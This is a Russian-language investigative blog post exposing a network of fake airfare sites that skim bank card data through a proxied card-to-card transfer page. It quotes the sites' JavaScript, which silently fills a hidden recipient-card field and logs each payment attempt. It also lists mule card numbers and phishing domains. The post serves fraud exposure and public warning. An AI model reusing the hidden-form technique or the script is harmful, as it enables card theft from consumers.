26 сентября 2016 в 13:26

Дешевые авиабилеты… Или сеть мошеннических сайтов, ворующих деньги с карт. Мое расследование из песочницы

В этой публикации речь пойдет о целой сети мошеннических сайтов, которые на протяжении долгого времени работают с единственной целью — похитить данные банковских карт и увести все доступные денежные средства с этих карт. В этой схеме используются на разных этапах сервисы известных компаний и банков. Таких как Яндекс (Поиск, Директ, YandexMoney, Карты), Промсвязьбанк, Банк Тинькофф и, вероятно, других.



История эта началась совсем недавно. Всего пять дней назад и, можно сказать, что пока еще не закончилась. Один мой знакомый обратился ко мне за консультацией с вопросом, можно ли как-нибудь закрыть «нехороший сайт»…

Итак, что же случилось?

Мой знакомый захотел купить авиабилеты и решил, что самый простой для этого способ — задать вопрос Яндексу. На простой запрос типа «самые дешевые билеты в Анапу» Яндекс одну из первых ссылок выдал на некий сайт, который служит для поиска и покупки дешевых билетов без комиссии. Ссылка эта, вероятно, была в верхнем рекламном блоке. Перейдя по ссылке, мой знакомый нашел себе подходящие билеты, оформил заказ, и попал на страницу оплаты с помощью банковской карты…

Сайт этот для среднего человека, если не вдаваться в детали, может оказаться совершенно обычным сайтом по поиску билетов и не вызвать подозрений. Домен _aviapromo.eu_

Вот так выглядит главная страница. Скриншот сохранился только с телефона.



Это поиск билетов:



Заказ оформлен:



Это страница оплаты:


На картинках мой пробный заказ, который я делал, чтобы разобраться, как работает этот сайт.

Мой знакомый оплатил билеты. При оплате по смс приходили коды подтверждения 3d Secure, которые, как это бывает обычно, нужно было вводить в браузере на соответствующей странице. Получив на почту «маршрутные квитанции» и считая, что билеты куплены, мой знакомый пошел заниматься своими делами.

На следующий день на телефон стали приходить «непонятные смс». Сначала пришла смс на списание с суммой в 2 рубля, и в ту же минуту эти 2 рубля вернули на карту с примечанием «отмена покупки». Еще через 2 часа непонятное списание и возврат 2 рублей повторились. И еще через минуту началось что-то невероятное. С карты списали 17700руб. Еще через 10 минут списали дополнительно 17700руб. Еще через 10 минут пытались списать 11800руб. Последняя операция не прошла только из-за того, что на карте кончились деньги. Я думаю, что если бы на карте был бы больший остаток, то списания бы продолжались каждые 10 минут до тех пор, пока не пришел бы отказ. История описываемых операций хорошо видна на заглавной фотографии — это скриншот смс'ок от Сбербанка, приходящих на телефон.

В момент первой «непонятной смс про 2 рубля», хоть это и показалось подозрительным, карта не была заблокирована. Все последующие списания были выполнены в течение 20-30 минут. Мой знакомый в это время был в общественном транспорте. Пытался дозвониться в Сбербанк для блокировки карты. Но как это обычно бывает, банк предлагал понажимать кнопочки в голосовом меню, а затем подождать в очереди. Быстро заблокировать карту через кол-центр банка не получилось. А приложение на смартфоне, через которое тоже можно было бы заблокировать карту, не было установлено. Карту потом заблокировали, но было уже поздно — деньги утекли. На следующий день мой знакомый написал заявление в сбербанк. На данный момент заявление находится на стадии рассмотрения. Карту перевыпустили.

Еще через два дня, уже когда карта была заблокирована, была попытка списать с карты 11800р, а еще через день новая попытка списать еще 23600руб. Т.е. это еще раз подтверждает, что тормозов у мошенников не было.



И на десерт, ко всем этим неожиданным списания, выяснилось, что никакой брони в авиакомпании нет и не было. Т.е. авиабилеты не были забронированы. Все было обманом и деньги ушли в неизвестном направлении.

В результате с карты украли (потери за оплаченные билеты и последующие списания) в общей сумме составили 47 377рублей. А могло бы быть гораздо больше.

Теперь попробуем разобраться, что же на самом деле произошло и где можно было обнаружить подвох.

1. Домен в зоне EU должен был по крайней мере насторожить.

2. Кроме поиска авиабилетов на сайте было всего несколько страниц, цель которых пустить пыль в глаза.

3. Если копнуть глубже, то указанный на странице ОГРН компании принадлежал компании, которая была закрыта в 2011 году. А само название компании в выписке ЕГРЮЛ и на сайте не совпадает, на сайте частично изменено. Проверить данные по ОГРН, ИНН и названию юридических лиц можно в базе налоговой инспекции egrul.nalog.ru.

4. Рейтинги сайта ТиЦ и PR нулевые (это видно в тех редких случаев, когда в браузере установлена панель вебмастера или что-то похожее).

5. Основное, что должно было насторожить. Должна была быть оплата без комиссии, как указано на сайте, 5900 за каждый авиабилет, а в смс от банка пришло назначение «Списание 5900.00 P2P PSBANK», а после оплаты этих 5900, приходила смс о том, что списано 5988,50р. Что такое «P2P» конечно знают не все. Можно было бы поискать. «P2P» — это сервис перевода с карты на карту. А сумма списания больше, чем сумма платежа, потому что банк, через который производился платеж, берет за это комиссию. Т.е. реально деньги, которые якобы оплачивались за авиабилеты, переводились на чью-то банковскую карту через сервис PSBANKa (Промсвязьбанк). При этом покупателю банк присылал проверочный код 3D Secure, который покупатель, ничего не подозревая, вводил в браузере.

6. Если с переводом на карту для меня понятно, что владельца карты ввели в заблуждение, чтобы он сам ввел код 3D Secure, то с последующими списаниями без проверки 3D Secure, для меня ситуация не совсем понятна. Я ни разу не сталкивался с ситуацией, чтобы Сбербанк в интернете позволял что-то оплатить без проверки 3D Secure (без подтверждения через SMS). Единственный исключение, когда смс не запрашивается, — это когда операции производятся через мобильное приложение СбербанкОнлайн на телефоне. Но телефон похищен не был и данные от личного кабинета похищены не были. Очевидно, что были получены только данные банковской карты моего знакомого. И, имея только данные карты, деньги списывались при использовании сервиса YM (Yandex.Money) в пользу Yandex.Direct (рекламная сеть Яндекса). Здесь есть явно какая-то недоработка в системе безопасности и возникает вопрос либо к Сбербанку, либо к Яндексу, как они такое позволяют делать.

В результате складывается примерно такая картина работы мошеннического сайта:

Сайт через рекламу в Яндекс.Директ привлекает посетителей. Без рекламы таким сайтам выбраться в топ выдачи практически нереально. Выглядит сайт в чем-то похожим на нормальные сайты. Поиск рейсов и свободных мест работает отлично. Для этого сайт принимает запрос посетителя, просит его подождать, сам отправляет запрос на какой-то другой сайт, на котором есть реальные данные по авиабилетам, из полученного ответа вырезается лишнее и подготовленная информация выдается на своей странице. Вполне возможно, что и цены немного корректируются (цены я не проверял). Дальше посетитель оформляет заказ, вводя свои данные. Ввод данных выглядит также, как и на многих других сайтах по продаже билетов. После ввода данных и подтверждения заказа, покупателю сообщают код заказа и дают 24 часа на оплату. При оплате оригинальная страница одного из банков с сервисом перевода P2P переделывается определенным образом (об этом ниже) и встраивается на мошеннический сайт. «Покупатель» авиабилетов, если не заметит подвох, переводит деньги на какую-то чужую банковскую карту. При этом данные банковской карты «покупателя» перехватываются и в дальнейшем используются для списаний — при этом пополняется счет какого-то аккаунта в Яндекс.Директ для последующей рекламы и поиска новых жертв. Дальше все тоже самое по кругу.

После всей этой истории было написано заявление в полицию (на рассмотрении), в сбербанк (на рассмотрении), в Яндекс, хостинг-провайдеру и др.

Мошеннический сайт размещался на хостинге FirstVDS. По моему заявлению с подробным описанием аккаунт мошеннического сайта заблокировали. Правда, через полдня опять разблокировали. Но по повторному заявлению опять заблокировали (надеюсь, уже навсегда), сославшись на то, что разные отделы провайдера не разобрались. Конечно, это не полная блокировка — мошенники могут поменять хостинг.

Одержав хоть маленькую и временную, но победу с закрытием сайта, нужно было решать вопрос с авиабилетами. И какого же было удивление, когда по аналогичному поисковому запросу Яндекс на первой строчке рекламного блока выдал другой сайт, который имел слегка измененный дизайн, но имел практически тот же функционал и похожий движок. Его цель — обман посетителей, кража денег и данных кредитных карт. Т.е. после того, как один сайт задушен, тут же появляется новый сайт (точнее он и раньше работал, просто в рекламе поднимаются не все сразу). Адрес другого сайта, по «якобы продаже авиабилетов» — _avia-scanners.ru_. Если представители Яндекса захотят проверить, то вот полная ссылка из Яндекс.Директа (в которой есть идентификатор рекламодателя.

_http://avia-scanners.ru/?utm_source=yandex&utm_medium=cpc&utm_campaign=21628812&utm_content=2877643372&utm_term=%D0%B0%D0%B2%D0%B8%D0%B0%D0%B1%D0%B8%D0%BB%D0%B5%D1%82%D1%8B%20%D0%BF%D0%BE%20%D1%80%D0%BE%D1%81%D1%81%D0%B8%D0%B8%20%D0%B4%D0%B5%D1%88%D0%B5%D0%B2%D0%BE


То, что этот сайт мошеннический, видно сразу, даже не вникая в технические детали, — указанный ИНН не существует, указанный ОГРН не существует, указанное юридическое название — не существует, указанный почтовый адрес — не существует итп. ИНН вообще указан двенадцатизначный, что бывает только у ИП и физ.лиц.

На заглавной странице картинки, которые должны вести на страницы скачивания мобильных приложений (в AppStore, Google Play и магазине для Windows Phone). Но все эти картинки не содержат ссылок на мобильные приложения.



В этот раз было решено более детально разобрать, как же этот сайт вводит пользователей в заблуждение на странице оплаты. Технология оказалась несложная.

Это внешний вид страницы оплаты на сайте «поиска авиабилетов».



Посмотрим исходный код страницы. Видим подозрительные папки "...P2P..." с различными скриптами. В этих скриптах я не нашел ничего интересного, что могло бы быть связано с похищением средств. В основном там были скорее всего не модифицированные скрипты банка, про который речь пойдет ниже.

А вот канонический адрес страницы нам интересен. Мы здесь видим, что фактически страница сервиса банка Тинькова (_www.tinkoff.ru/cardtocard/_) почти полностью включена в мошеннический сайт. Причем здесь используется не окно iframe. Здесь именно при использовании промежуточной обработки на сервере хостинг-провайдера страница скачивается с сайта Тинькова, потом на сервере модифицируется и почти полностью с небольшими «бонусами» выкладывается.



Мое предположение было, что в HTML коде должен быть скрытый блок DIV, скрытая форма или что-нибудь похожее. А скорее всего несколько таких скрытых блоков. И предположение подтвердилось. Нажимаем в браузере F12 (средства для веб-разработки). Находим нужный нам скрытый блок. Видим в колонке справа его свойство display:none



Щелкаем по чекбоксу, чтобы отключить свойство display:none и… Тайное становится явным.
Мы видим предзаполненную форму с номером чужой кредитной карты, на которую должны уйти наши деньги.



А вот так выглядит оригинальная страница банка Тинькова. Правда похоже? Т.е. что происходит? Форма частично заполняется. Из этой формы скрывается все лишнее (блок с картой получателя), часть какая-то может быть даже не скрывается, а вырезается на сервере. И эта страница в измененном виде подсовывается посетителям сайта, в надежде, что они ничего не заподозрят.



И на десерт вот исходный html код с предзаполненным номером банковской карты получателя.



И вот еще интересный кусок кода.



Этот же кусок со скриптом в текстовом виде ниже:

Давайте попробуем разобраться, что в коде происходит.

В коде задан массив с номерами карт получателей. Эти номера скриптом подставляются в форму оплаты. Теоретически может быть семь разных карт получателя и при каждой неудачной попытке оплаты номер карты должен меняться. Но, вместо семи разных номеров, задан один и тот же номер несколько раз. Т.е. при неудачной попытке следующая попытка будет с тем же самым номером карты получателя.

И для того, чтобы был порядок, при каждой попытке оплаты данные передаются на страницу на этом мошенническом сайте, которая все записывает для бухгалтерии. Вечером, вероятно, придет «бухгалтер» и проверит записи в журнале.
$("#card_number").on('blur', function () {
    $("#transfer__card_number").change();
});

function refr() {
    $("#transfer__card_number").change();
}

popitka = 0;
function addpay(title, status) {

    var newcards = [
        '5106 2160 0313 4297',
        '5106 2160 0313 4297',
        '5106 2160 0313 4297',
        '5106 2160 0313 4297',
        '5106 2160 0313 4297',
        '5106 2160 0313 4297',
        '5106 2160 0313 4297',
    ];
    if (status == 0) {
        $('#card_number2').val(newcards[popitka]);
        $('#card_number2').change();
        popitka = popitka + 1;
    }

    $.ajax({
        url: 'http://avia-scanners.ru/addpay.php?sum=' + 3272 + '&status=' + status + '&title=' + title + '&code=lyyPt',
        success: function () {
            xhr.abort();
        }
    });
}

$(document).ready(function () {
    $("#card_number2").keyup();
    $('#card_number2').change();
});
При каждом посещении страницы оплаты (Можно, например, разными браузерами попробовать), в поле получателя платежа подставляется новый номер карты. Вот номера карт, на которые мошенники выводили деньги, крадя их у посетителей сайта по продаже авиабилетов. Этих карт точно намного больше. Привожу номера на случай, если кто-нибудь заинтересуется статьей и захочет провести проверку…

5106 2160 0313 4297
5106 2160 0408 7015
5106 2160 0310 8804

Что в этих картах сходного? Правильно, начальные цифры 5106 21…

Попробуем поискать по базе BIN номеров банков.
Вот такой интересный результат получается:
Issuing Bank: YANDEX MONEY NBCI.LLC
Card Type: MASTERCARD

Случайным образом мошенники используют рекламу от Яндекса (Яндекс.Директ), Сервис перевода денег Yandex.Money и дополнительно через сторонние банки выводят средства на банковские карты, выпущенные Яндексом. Абсолютно точно Яндекс в этих махинациях никак не замешан, но Яндекс мог бы сильно помочь в уменьшении количества мошеннических операций. Возможно для этого какие-то правила или регламенты нужно изменить. Письма в Яндекс я тоже писал. Информацию они приняли, как распорядятся ей, я не знаю. Помочь с блокировкой средств они мне не смогли, но написали, «По Вашему запросу мы провели расследование и приняли все необходимые меры...» Что меня приятно удивило в службе поддержки Яндекса, касающейся мошеннических операций, — в полтретьего ночи пишешь им письмо — через 10-15 минут приходит ответ живого человека.

Судя по сообщениям, которые я нашел в интернете, эти сайты работают давно и количество пострадавших немаленькое. А по прикидкам, пострадавших может быть довольно много. В интернете есть сообщения о пострадавших и годичной давности, а есть сообщения, размещенные пять дней назад, об оплаченных авиабилетах на мошенническом сайте, про который я в первой половине написал.

Но и это еще не все. На многих мошеннических сайтах по продаже авиабилетов есть одна общая черта, однозначно объединяющая их и указывая, что они относятся к одной группе. Здесь не буду писать, что это за особенность, чтобы не помогать злоумышленникам. Но вот только некоторые мошеннические сайты из этой группы найденные за несколько минут: _avialex.ru_, _avia-kassa.ru.com_, _flyseven.ru_, _aviasalesdirectly.ru_, _avia-run.ru_, _aviasalle.com_.

Часть из этих сайтов уже заблокирована и находится в черных списках на разных отзовиках. Последний сайт в списке сейчас прикинулся зайчиком. Это был очередной сайт, который ждал своего звездного часа. Он тоже расположен на хостинге FirstVDS. Сайт временно отключил мошеннический функционал, после того, как я и его попросил заблокировать. Поэтому пока его не заблокировали.

Т.е. мы видим, что это не разовая поделка. Мошенники годами используют отработанную схему. Используются домены в разных зонах, разные хостинги, сервисы разных банков для переводов с карты на карту (кроме Тинькова и Промсвязьбанка могут быть и другие), вывод денег производится на большое количество карт. Если только с одной карты можно легко угнать 47 тр, то какие могут быть в общем объеме вороваться суммы?

Со своей стороны я разных писем и заявлений много написал. Но всю сеть победить одному человеку затруднительно, если только не положить на это 100% своего времени.

Главное, будьте бдительны при оплате авиабилетов на незнакомых сайтах и тогда и мошенникам будет сложнее.

UDP.
Про _avia-scanners.ru_ я заявления провайдеру не писал (хостинг у этого сайта sprinthost.ru — отличается от первого). Этот сайт оставил для того, чтобы читатели публикации смогли его препарировать и разобрать. Сейчас этот сайт уже не работает.

Кто-то из читателей успел поиграть с ним. Но сейчас он не доступен. На главной странице «Forbidden/ You don't have permission to access / on this server. Apache/2.4.17 Server at avia-scanners.ru Port 80»



Почему _avia-scanners.ru_ стал недоступен, точной информации нет. Может не выдержал нагрузки, может представитель провайдера прочитал статью и закрыл сайт, может представители банка ТКС или Сбербанка прочитали статью и написал провайдеру, может Яндекс как-то посодействовал, может кто-то из представителей правоохранительных органов, а может админ этого сайта, завсегдатай geektimes и, прочитав статью, осознал что был не прав, и решил встать на путь исправления.

В любом случае Ваша активность помогла закрыть еще один фишинговый сайт. Я надеюсь, что это спасет кого-нибудь из потенциальных покупателей авиабилетов, от попадания в неприятную историю

UDP2 (27.09.2016)
Как я писал, количество сайтов может быть очень большим. Спасибо пользователю triton, он в комментариях указал еще три новых точно таких же мошеннических сайта _flying-avia.ru_, _scanner-ticket.ru_, _scanner-aero.ru_. Я уверен, что есть или появятся в ближайшее время и другие сайты. В нижней части этой публикации размещу сводную таблицу. Если кто-то еще найдет подобные сайты, готов добавить информацию о них в эту таблицу.

Пока три найденных новых сайта работают и те, кто не успел препарировать предыдущие сайты до того, как их закрыли, может сделать это сейчас. Эти новые три сайта работают практически одинаково, по той же самой схеме, что и разобранный в статье _avia-scanners.ru_. Минимальное изменение дизайна, минимальное изменение контактных данных. Мелочи типа девятизначного ИНН не принимаются в расчет. Используется тот же самый сервис банка Тинькова, что очень хорошо видно на скриншотах.

Публикация получилась длинной. Поэтому часть новых скриншотов буду убирать под спойлер.

Скриншоты заглавных страниц четырех новых сайтов. Да, это не один сайт
_scanner-ticket.ru_


_flying-avia.ru_


_scanner-aero.ru_


_aviasalle.com_


Страницы оплаты на новых сайтах. Тот же сервис P2P от банка ТКС
_flying-avia.ru_, так как ее видит пользователь


_flying-avia.ru_, если скрытые элементы показать. Здесь я кроме карты открыл еще скрытое поле «сумма».


_scanner-ticket.ru_, если показать скрытые элементы


_scanner-aero.ru_, если показать скрытые элементы



На новых трех сайтах обнаружены следующие номера кредитных карт, на которые мошенники выводят средства:
5106 2160 0451 0834 получена на _flying-avia.ru_
5106 2160 0909 7977 получена на_scanner-ticket.ru_
5106 2160 0451 0834 получена на_scanner-aero.ru_

Два из трех указанных сайтов, предлагают выводить средства на одну и ту же карту. Причем эти два сайта, хоть и расположены у одного хостинг-провайдера, но работают на разных IP (см. таблицу внизу). И опять новые карты выпущены Яндекс.Банком.

Дополнительно на новых сайтах при оплате предлагается на выбор два способа оплаты. Первый — картами, второй через терминалы. На первых описываемых сайтах, если я ничего не пропустил, не было возможности оплатить «авиабилеты» через терминал. Давайте посмотрим, как же происходит оплата через терминал. На сайтах выложена подробная инструкция «как оплатить через терминал» Инструкция длинная, размещена под спойлером. В этой инструкции вообще хитростей нет. Невнимательным покупателям предлагается просто прийти к терминалу и положить деньги на чей-то QIWI кошелек. Номер телефона кошелька в инструкции указан.
Оплата авиабилетов через терминал. Инструкция на сайте _scanner-ticket_ru


Мошеннические сайты по продаже авиабилетов
_avialex.ru_ Архивный
_avia-kassa.ru.com_ Архивный
_flyseven.ru_ Архивный
_aviasalesdirectly.ru_ Архивный
_avia-run.ru_ Архивный
_aviasalle.com_ Провайдер FirstVDS Пока работает, после заявления скрыл мошеннический функционал
_aviapromo.eu_ Провайдер FirstVDS Заблокирован провайдером 22.09.2016
_avia-scanners.ru_ Провайдер Sprinthost, IP 141.8.195.50 Перестал работать после статьи на geektimes 26.09.2016
_flying-avia.ru_ Провайдер Sprinthost, IP 141.8.195.50 Заблокирован провайдером 27.09.2016 после прочтения статьи на geektimes
_scanner-ticket.ru_ Провайдер Sprinthost, IP 141.8.195.50 Заблокирован провайдером 27.09.2016 после прочтения статьи на geektimes
_scanner-aero.ru_ Провайдер Sprinthost, IP 141.8.195.138 Заблокирован провайдером 27.09.2016 после прочтения статьи на geektimes
_scaner-avia.ru_ Провайдер Sprinthost, IP 141.8.195.138 Заблокирован провайдером 27.09.2016 после прочтения статьи на geektimes
_pilotavia.ru_ Провайдер TheFirst-RU clients (WebDC Msk), IP 188.120.250.184 Был как две капли похож на _aviapromo.eu_ После упоминания в статье на geektimes по состоянию на 28.09.2016 отображается сообщение — «Сайт временно отключен»
_letofly.biz_   Пока доступен. Был как две капли похож на _aviapromo.eu_, после упоминания на geektimes 29.09.2016 быстро сменил внешний вид, убрав мошеннический функционал. На сайте указано, что домен якобы выставлен на продажу. При этом в элементах нового дизайна используются логотипы и название немошеннического сайта
_avia.netprosolution.co_   РАБОТАЕТ, крадет деньги и данные карт, сильно но не полностью похож на _aviapromo.eu_.

Примечание по списку сайтов в таблице. Когда я начал составлять эту таблицу, я подозревал, что подобных сайтов много, но не подозревал, сколько именно. Простой поиск в поисковых системах дает ссылки на как минимум на пару десятков подобных сайтов. Некоторые из них еще есть в поисковиках, но уже недоступны (можно посмотреть только закешированную версию). Список ранее действовавших подобных сайтов, но уже заблокированных составляет более 400шт. Поэтому с Вашего позволения, я эту таблицу больше не буду дополнять, за исключением каких-либо особенных сайтов, разбор которых может быть интересен.

Вот для примера сотня заблокированных сайтов мошенников по продаже авиабилетов
_fly-4you.ru_
_economavia.ru_
_nticket.ru_
_red-avia.com_
_lykafe.ru_
_max-fly.ru_
_tourfly.biz_
_bilet-poisk.ru_
_masterfly.ru_
_future-fly.ru_
_tiptopair.ru_
_100bilet.ru_
_go-go-travel.com_
_point-avia.com_
_avianeo.ru_
_itarifyaviabilety.ru_
_eg-avia.ru_
_horoshoairbilety.ru_
_aviakassa-sales.ru_
_gogoavia.com_
_avia-toptickets.ru_
_poiskovik-airline.ru_
_ticket-online.ru_
_avia-fun.com_
_disavia.ru_
_expressaviabilet.ru_
_moi-avia.ru_
_онлайн-авиа.рф_
_slim-avia.org_
_fly-info.ru_
_aviakassaonline24.ru_
_bestavias.ru_
_oaviabiletychelny.ru_
_etoavia.ru_
_aviakassabiletov.ru_
_avia-online24.ru_
_onlinepolet.ru_
_tip-trip.biz_
_disaero.ru_
_ticket-planet.ru_
_flyglobal.ru_
_mainavia.ru_
_ticket2avia.ru_
_online-airlines.ru_
_super-avia.ru_
_fun-avia.com_
_avia-book.ru_
_poiskvnebo.ru_
_avia-world.ru_
_aviachild.ru_
_aviaonline.org_
_deshevoavia.ru_
_vnemli.ru_
_moifly.ru_
_экспресс-авиа.рф_
_grundfly.ru_
_airbiletyonline.ru_
_fast-fly.ru_
_zaaviabiletom.ru_
_splash-avia.com_
_bystro-aviabileti.ru_
_aviabulet.ru_
_xdavia.ru_
_mytripbonus.ru_
_broniruem-online.ru_
_newgoaaviabilety.ru_
_search-fly.ru_
_privat-air.org_
_biletnasamoletonline.ru_
_smilefly.ru_
_x-avia.ru_
_raido-rent.com_
_avia-rsexpress.ru_
_aviaspecmontag.ru_
_just-avia.ru_
_onlyavia.ru_
_letimairlanes.ru_
_avia-russia.ru_
_trip-avia.com_
_aviagold.ru_
_deshevo-poletet.ru_
_avia-kafe.ru_
_poisk-avia.ru_
_fly-land.ru_
_aviaup.ru_
_продажа-авиа.рф_
_airlines-travel.ru_
_cafe-avia.ru_
_avia-cloud.com_
_fly-corp.ru_
_eco-avia.com_
_ticket-aero24.ru_
_turscannerpro.ru_
_roomticket.ru_
_flyfiaryav.ru_
_express-avia.ru_
_broniruem24.ru_
_wow-avia.ru_
_sky-trips.ru_
_aviabin.ru_

Негативные отзывы, истории кражи денег при покупке билетов, черные списки можно найти на разных интернет-сайтах. При таком масштабе, в рамках этой статьи не имеет смысла в дежурном режиме обновлять таблицу. Масштаб действий мошенников на сайтах якобы продажи авиа (и иногда жд) билетов понятен. Когда есть один сайт, то мошенника вычислить и поймать не всегда возможно. Когда есть десятки и сотни сайтов, то, наверняка, мошенники не могут работать так, чтобы не оставалось следов. Или у провайдеров, или у банков, или у интернет-компаний, или у регистраторов доменов, или еще где-то должны оставаться следы. Поэтому если будет чьё-то волевое решение, то всю эту схему можно расследовать и найти ответственных за нее лиц.

UDP3:
Спасибо пользователю semb. В комментариях он указал еще на один сайт _pilotavia.ru_
Этот сайт примечателен тем, что он как две капли похож, на сайт _aviapromo.eu_ (на тот сайт, на котором герой этой статьи имел «неосторожность купить авиабилеты». Сайт этот продолжает работать. Это не просто похожий сайт, а такой же сайт, просто размещённый на другом хостинге и домене. Теперь есть возможность посмотреть подробнее, как сайт работает. Для тех, кто хочет поэкспериментировать, можно сразу начинать со ссылки _https://pilotavia.ru/?code=BX3FKT_ (Это ссылка с оформленным заказом, на которой есть возможность перейти к оплате. Времени на оплату дают 24 часа).
Заглавная страница, страница поиска рейсов и страница оплаты_pilotavia.ru_ такие же как у первого в статье сайта




На следующей странице в панели вебмастера по загрузке файлов видно, что реальные данные по наличию мест на рейсах получаются с нормального не мошеннического сайта aviacassa_ru. Текстовые данные, вероятно, корректируются на сервере, а ссылки на картинки остаются без изменений.


Тем, кто справшивал про https и детали сертификата. Появилась возможность проверить.
Сайт использует защищенное соединение и сертификат от Let's Encrypt. Интересная особенность, — сертификат выпущен сроком на три месяца. Это, наверное, для экономии? Реально оценивают срок жизни такого сайта.



Еще одна деталь. Сайт использует сервис Webvisor от Яндекса. Видно по запросам в нижней части панели на картинке ниже. Для тех, кто не в курсе это очень удобный сервис для записи поведения пользователей на сайте. Потом можно смотреть что-то похожее на видео про то, что пользователи делали на сайте. Использование вебвизора означает несколько моментов. — Мошенник зарегистрировал сайт в Яндекс.Метрике имеет подробную статистику о действиях пользователей на его сайте. Возможно даже номера карт получаются из данных вебвизора, хотя скорее всего номера карт записываются программным путем на сайте. Оборотная сторона медали — у Яндекса хранится полностью запротоколированная история всех операций на фишинговом сайте. Т.е., теоретически, если к этой информации получат доступ правоохранительные органы (если это в принципе осуществимо), то можно полностью восстановить картину по каждому случаю мошенничества и понять объем мошеннических операций.



Теперь про сам механизм кражи денег _pilotavia.ru_, а значит и _aviapromo.eu_. Это сайты не используют страницу банка Тинькова. Поскольку кража денег, описываемая в этой статье, была осуществлена через P2P PSBANK (Промсвязьбанк), было предположение, что точно так же страница Промсвзяьбанка изменяется и подставляется пользователю. Но при анализе HTML кода страницы оплаты я не обнаружил, никаких частей страниц каких-либо банков, не используются встраиваемые окна iframe, вообще не используются скрипты, а сама страница очень простая и не похожа на страницу Промсвязьбанка.
<form class="b-card-feature-list clearfix" id="formPay" action="payp2p.php" method="post">
По сути это страница представляет собой только форму для ввода номера карты. При подтверждении формы обработка передается программе payp2p.php. Это программа может делать что угодно, но код ее нам недоступен, — код выполняется на стороне сервера. Вероятно, эта программа получает данные карты, а дальше программным путем на стороне сервера каким-то образом заполнят форму Промсвязьбанка, а у пользователя запрашивает код подтверждения 3D Secure. Данные карты естественно сохраняются и могут быть в дальнейшем использованы для дополнительных списаний на разных сайтах. Если кто-то более подробно сможет вычислить алгоритм работы этого сайта — буду благодарен. По заявлению в полицию начато расследование — любая информация, которая может раскрыть преступную схему, приветствуется.

UDP4 (27.09.2016): Информация, для тех, кто спрашивал.
На данный момент деньги не вернули ни по платежам, которые ушли на чужие карты, ни по платежам, которые ушли в Яндекс.Директ. (Про платежи в Яндекс.Директ в банк было подано заявление менее через за 24 часа после списаний). Официального ответа от Сбербанка нет (15 дней еще не прошло). Сегодня для следователя делали бумажную выписку в отделении Сбербанка. Суммы списаны. Про получателей платежей в выписке никакой дополнительной информации нет.

Фрагмент выписки

Полные выписки из Сбербанка под спойлером





UDP5 (30.09.2016). Пользователь Vad_R в личку прислал свою реальную историю «покупки авиабилетов», при которой у него четыре месяца назад с карты украли ~20500р. Этот случай добавляю в публикацию, чтобы показать какие ещё бывают «способы относительно честного отъема денег у населения». Описание и детали под спойлером.

Если коротко, то на первых этапах оформление выглядит очень красиво, а после ввода данных банковской карты, они просто отправляются мошенникам, которые даже не стали утруждать себя какой-либо маскировкой своих действий. В последнем сообщении, которые видит пользователь допущены как минимум три грамматические/орфографические ошибки. Вероятно, в этом случае работали двоечники…


После ввода данных карты деньги были выведены переводом на чью-то чужую карту через сервис MMBANKa (Банка Москвы). Деньги вернуть не удалось. Заявление в полицию было написано. Дело закрыто «из-за отсутствия события преступления»
Подробности этого случая
Сайт по продаже авиабилетов выглядит прилично.


Страница поиска рейсов


Страница заполнения данных пассажира


Страницы ввода данных банковской карты, к сожалению, нет.

А вот чем закончилось.


Карта была привязанной к кошельку в Яндекс.Деньгах. Вот выписка из личного кабинета Яндекс.Денег.


Ниже объяснение того, что произошло. Вот цитата из заявления потерпевшего, которое было подано в отдел полиции №1 «Алупкинский» УМВД России по г.Ялте
З А Я В Л Е Н И Е
Прошу провести проверку настоящего заявления по факту незаконного завладения принадлежащими мне денежными средствами (мошенничества) неизвестными мне лицами, которые используя сайт, предлагающий услуги по продаже авиа билетов, а именно _forair.ru_ присвоили сумму в размере 19967,45 руб
Я, 04 июня 2016 года при поиске подходящего по стоимости билета зашел на сайт _forair.ru_ Данный сайт был в выдаче платных рекламных объявлений Яндекс Директ. Меня интересовали 3 билета из Санкт-Петербурга в Симферополь, которые я приобретал для спортсменов – конников. 11 июня в г. Санкт-Петербурге пройдут соревнования по конному спорту, где будет участвовать команда спортсменов, представляющая Крым.
Заполнил страницу, на которой указал паспортные данные пассажиров и далее сайт перенаправил меня на страницу оплаты, на которой я ввел данные своей карты Яндекс-Деньги, включая номер карты, дату окончания действия и CVV 2 код. После оплаты суммы, в размере 19653,00 руб (данная сумма была указана к оплате) сайт выдал сообщение, что данные введены неправильно и я должен ожидать 14 дней возврата денег. (скриншот сообщения прилагаю)
Заподозрив неладное начал изучать отзывы о сайте _forair.ru_ в интернете и понял, что попал на сайт – мошенник. После чего я обратился в службу поддержки банка, где мне ответили, что не могут вернуть деньги и посоветовали заблокировать карту и обратиться в полицию. В настоящий момент карта уже заблокирована.

Цитата ответа Яндекс.Денег на электронное обращение потерпевшего № 2787878 (06.06.2016)
Мы провели расследование и приняли необходимые меры, однако, к сожалению, не смогли вернуть Ваш платёж.
...

Полиция фактически отказалась расследовать дело, сославшись на то, что Яндекс им не ответил. При этом ждали недолго. 05.06.2016 потерпевший подал заявление в полицию, 13.06.2016 получил отказ в возбуждении уголовного дня. За 8 дней отделение полиции должно было направить официальный запрос в Яндекс и получить ответ. Обратите внимание, что отделение полиции находится в Ялте. Если запрос был направлен не электронным образом, то это слишком короткий срок. Может полиции просто нужно было еще несколько дней подождать ответ от Яндекса? Как говориться, «На нет и суда нет». Полный текст ответа из полиции в картинках ниже. Фамилии и лишние данные были стерты.


===========================================================================


Если нужны подробности, обращайтесь к пользователю Vad_R

UDP6 (06.10.2016) Сбербанк на обращение потерпевшего от 20.09.2016 "ответил". Написали, что срок рассмотрения продлили дополнительно на 30 дней. Деньги на данный момент не вернулись.

UDP7 (19.10.2016) Деньги, которые были списаны за Яндекс.Директ, вернулись 12.10.2016 (17700р+17700р). Возврат произошел через 22 дня с момента подачи заявления в банк.
Деньги, которые ушли на чью-то карту ~5900р+5900р+комиссия на данный момент по состоянию на 13.11.2016 не вернулись.

Смс с подтверждением возврата.


UDP8 (13.11.2016)
Опубликована вторая часть публикации с продолжением: Дешевые авиабилеты… Сеть мошеннических сайтов, ворующих деньги с карт. Расследование-Часть2. При чём здесь Промсвязьбанк?

UDP9 (02.03.2017)
Написал новую статью, в некоторой степени имеющую отношение к этой публикации: Яндекс игнорирует проверку 3D Secure при оплате рекламы в Яндекс.Директ с помощью банковских карт.
Алексей @xbox
карма
73,0
рейтинг 0,0
Программист
Самое читаемое

Комментарии (399)

  • +1
    Сурово, однако. Думал все эти card2card не дают себя в фрейме открывать…
    • +10
      Вы хоть читали? Там фреймов нету, есть клиент-серверная прокладка.
      • +1
        Я так и не понял, зачем вообще что-то куда-то встраивать, если можно тупо украсть код и «на той стороне» всё отправить?
